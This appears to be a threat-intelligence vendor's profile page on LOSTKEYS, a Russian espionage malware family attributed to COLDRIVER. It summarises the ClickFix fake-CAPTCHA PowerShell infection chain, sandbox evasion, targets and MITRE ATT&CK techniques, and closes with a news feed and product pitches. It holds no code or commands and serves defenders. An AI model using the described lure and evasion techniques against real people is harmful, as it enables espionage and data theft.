MalwareUsed by 1 actor

LOSTKEYS

LOSTKEYS is a malware family attributed by Google Threat Intelligence Group to the Russia-linked cyberespionage actor COLDRIVER, also known as Star Blizzard, Callisto, UNC4057, Seaborgium, and TA446, and described in the reporting as linked to Russia’s FSB. It was observed in targeted espionage operations in January, March, and April 2025, with possible earlier related samples from December 2023 that Google could not conclusively tie to the same operation. COLDRIVER historically focused on credential phishing, but reporting states LOSTKEYS marked a shift toward deeper host compromise and post-compromise intelligence collection.

The malware is used to steal files and collect host information from compromised Windows systems. Reported capabilities include exfiltrating documents from a hard-coded list of file extensions and directories, gathering system information, and enumerating running processes. Multiple sources describe the final payload as a Visual Basic Script. The infection chain is multi-stage and commonly begins with fake CAPTCHA or ClickFix-style lures that trick victims into pasting and executing malicious PowerShell via the Windows Run dialog. The staged PowerShell retrieves successive payloads from attacker-controlled infrastructure, with unique identifiers per victim. Reported anti-analysis behavior includes a sandbox-evasion check based on the MD5 hash of the device’s display resolution. The final payload decoding reportedly uses a two-key substitution cipher, with unique key pairs per infection chain.

Victimology consistently centers on high-value espionage targets: current and former advisors to Western governments, military personnel, diplomats, journalists, think tanks, NGOs, non-profits, civil society organizations, and individuals connected to Ukraine. Reporting also describes targeting across NATO countries, the Baltics, Nordics, Eastern Europe, and Western countries more broadly. The assessed objective is intelligence collection in support of Russian interests.

Google reported technical details, indicators of compromise, and YARA rules for detection, and stated that identified malicious domains and files were added to Safe Browsing. Reporting further states that after public disclosure of LOSTKEYS in May 2025, COLDRIVER rapidly pivoted to new malware families including NOROBOT, YESROBOT, and MAYBEROBOT, and Google said it did not observe further LOSTKEYS use after that transition.

For your environment

Hunt this family in your stack

Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.

Start free trial

THREAT ACTORS

Groups observed using it

1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.

View more details

Star Blizzard

Russian cyber espionage hackers are using a new malware strain dubbed "Lostkeys" in a targeted espionage campaign aimed at Western officials, NGOs and journalists.

via bank info securitybankinfosecurity.com

MITRE ATT&CK

Techniques & procedures

13 distinct techniques documented for this family, organized by ATT&CK tactic.

Initial Access

1 technique

T1566PhishingEvidence2

TacticInitial Access

"Typically, the threat group deploys malware in phishing attacks..."

Execution

3 techniques

T1059.001PowerShellEvidence1

TacticExecution

The Lostkeys attack chain begins with a fake Captcha page that tricks victims into pasting malicious PowerShell code into their Windows Run prompt... Once executed, the PowerShell script pulls in successive payloads, each retrieved from the same command-and-control server but requiring unique identifiers per victim.

T1059.005Visual BasicEvidence1

TacticExecution

The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories, gathers system information and running processes and sends them back to the attacker.

T1204User ExecutionEvidence2

TacticExecution

The Lostkeys attack chain begins with a fake Captcha page that tricks victims into pasting malicious PowerShell code into their Windows Run prompt, a technique dubbed "ClickFix".

Persistence

1 technique

T1112Modify RegistryEvidence1

TacticsPersistence Defense Impairment

"...splits encryption keys across multiple files and registers entries to hinder tracking and analysis."

Stealth

3 techniques

T1027Obfuscated Files or InformationEvidence1

TacticStealth

"It allows hackers to install malware in stages while concealing its core components across multiple downloads."

T1036MasqueradingEvidence1

TacticStealth

"...trick victims into manually launching a disguised program file..." and "...embedding malicious code into fake PDF documents and convincing targets to download a 'decryption' utility..."

T1497Virtualization/Sandbox EvasionEvidence1

TacticsStealth Discovery

The malware shows signs of sandbox evasion. Before advancing to the final stage, the second-stage code checks the device's display resolution hash and halts execution if it matches a known virtual machine setup.

Defense Impairment

1 technique

T1112Modify RegistryEvidence1

TacticsPersistence Defense Impairment

"...splits encryption keys across multiple files and registers entries to hinder tracking and analysis."

Discovery

3 techniques

T1057Process DiscoveryEvidence1

TacticDiscovery

T1082System Information DiscoveryEvidence1

TacticDiscovery

T1497Virtualization/Sandbox EvasionEvidence1

TacticsStealth Discovery

Collection

1 technique

T1005Data from Local SystemEvidence2

TacticCollection

The final payload is a Visual Basic Script file, which exfiltrates files with specific extensions from targeted directories...

Command and Control

1 technique

T1071Application Layer ProtocolEvidence1

TacticCommand and Control

Once executed, the PowerShell script pulls in successive payloads, each retrieved from the same command-and-control server but requiring unique identifiers per victim.

Exfiltration

1 technique

T1041Exfiltration Over C2 ChannelEvidence2

TacticExfiltration

ACTIVITY FEED

Recent activity

23 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.

23 SOURCESView more in app

cloudatg insightsNews

Feb 13, 2026

AI Development & Software Engineering | CloudATG

Espionage-focused malware capable of stealing files (by extension/directory list) and exfiltrating system/process information.

alphahunt blogNews

Oct 23, 2025

COLDRIVER’s Next Move

A previously documented COLDRIVER malware/tool referenced as an earlier 2025 capability that the actor pivoted away from in favor of the ROBOT chain. No functional details are provided in the content.

cso onlineNews

Oct 22, 2025

‘I am not a robot’: Russian hackers use fake CAPTCHA lures to deploy espionage tools

Previously used espionage malware attributed to ColdRiver; described as having been exposed earlier in 2025 and subsequently replaced by newer tooling.

the hacker newsNews

Oct 21, 2025

Google Identifies Three New Russian Malware Families Created by COLDRIVER Hackers

Information-stealing malware previously deployed by COLDRIVER in early 2025; GTIG reports no observed instances after public disclosure.

+19 more in the timeline

What this page doesn’t show

The version that knows your environment.

This page is what’s public. Mallory adds the parts that aren’t: which of your assets match these IOCs, which detections are missing, which campaigns to expect next, and what to do in the next 30 minutes.

Start free trial

IOC matching

Match every observed IP, domain, and hash against your live telemetry.

Threat actor attribution1

Named campaigns wielding this family, with evidence pinned to each claim.

Exploited vulnerabilities

CVEs this family uses for access and lateral movement.

Detection signatures

YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.

MITRE ATT&CK mapping13

Every documented technique, ranked by evidence weight.

Researcher chatter

Reddit, Mastodon, and CTI community discussion around this family.